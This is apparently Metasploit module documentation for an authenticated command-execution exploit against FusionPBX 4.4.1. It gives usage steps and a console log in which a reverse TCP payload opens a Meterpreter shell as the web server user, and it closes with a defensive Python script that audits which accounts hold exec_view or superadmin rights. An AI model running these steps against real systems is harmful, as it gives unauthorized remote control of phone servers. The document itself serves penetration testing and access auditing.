## Description

This module uses administrative functionality available in FusionPBX to gain a shell.

The Command section of the application permits users with `exec_view` permissions,
or superadmin permissions, to execute arbitrary system commands, or arbitrary PHP code, as the web server user.

## Vulnerable Software

This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64).

Software:

* https://www.fusionpbx.com/download
* https://github.com/fusionpbx/fusionpbx/releases

## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/fusionpbx_exec_cmd_exec`
3. Do: `set rhosts `
4. Do: `set username ` (default: `admin`)
5. Do: `set password `
6. Do: `run`
7. You should get a new session

## Options

**TARGETURI**

The base path to FusionPBX (default: `/`)

**USERNAME**

The username for FusionPBX (default: `admin`)

**PASSWORD**

The password for FusionPBX

## Scenarios

```
msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214
rhosts => 172.16.191.214
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin
username => admin
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc
password => PXRtwZqSkvToC4gc
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
   1   Automatic (Unix In-Memory)
   2   Automatic (Linux Dropper)

msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[+] Authenticated as user 'admin'
[*] Sending payload (1115 bytes) ...
[*] Sending stage (38288 bytes) to 172.16.191.214
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400

meterpreter > getuid
Server username: www-data (33)
meterpreter >
```
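
Because the Description ties command execution to the `exec_view` permission and to superadmin rights, an administrator can audit which enabled accounts hold either one. The following is an added example, not part of this module or of FusionPBX: the input layout (user-to-groups and group-to-permissions mappings), the group name `superadmin`, and all sample data are assumptions constructed for illustration.

```python
# Added example; the data layout is an assumption, not FusionPBX's schema.

EXEC_PERMISSION = "exec_view"    # permission named in the module description
SUPERADMIN_GROUP = "superadmin"  # assumed name of the group carrying superadmin rights


def accounts_with_command_access(user_groups, group_permissions, enabled):
    """Return {username: sorted reasons} for enabled accounts that can run commands."""
    findings = {}
    for user, groups in user_groups.items():
        if not enabled.get(user, False):
            continue  # assumption: disabled or unknown accounts cannot log in
        reasons = set()
        for group in groups:
            if group == SUPERADMIN_GROUP:
                reasons.add(f"member of {SUPERADMIN_GROUP}")
            if EXEC_PERMISSION in group_permissions.get(group, ()):
                reasons.add(f"{EXEC_PERMISSION} via group {group}")
        if reasons:
            findings[user] = sorted(reasons)
    return findings


def unexpected_access(findings, approved):
    """Return accounts with command access that are not on the approved list."""
    return sorted(set(findings) - set(approved))


# Constructed sample data: every name and permission except exec_view is made up.
SAMPLE_USER_GROUPS = {
    "admin": ["superadmin"],
    "pbx-ops": ["admin"],
    "helpdesk": ["agent", "reports"],
    "old-contractor": ["reports"],
}
SAMPLE_GROUP_PERMISSIONS = {
    "superadmin": ["exec_view", "user_edit"],
    "admin": ["user_edit"],
    "agent": ["call_view"],
    "reports": ["exec_view", "cdr_view"],  # exec_view granted by mistake
}
SAMPLE_ENABLED = {"admin": True, "pbx-ops": True, "helpdesk": True, "old-contractor": False}

if __name__ == "__main__":
    found = accounts_with_command_access(SAMPLE_USER_GROUPS, SAMPLE_GROUP_PERMISSIONS, SAMPLE_ENABLED)
    for user, why in found.items():
        print(f"{user}: {', '.join(why)}")
    print("review:", unexpected_access(found, approved={"admin"}))
```

Any account reported outside the approved list can execute commands as the web server user and should have the permission removed or its credentials reviewed.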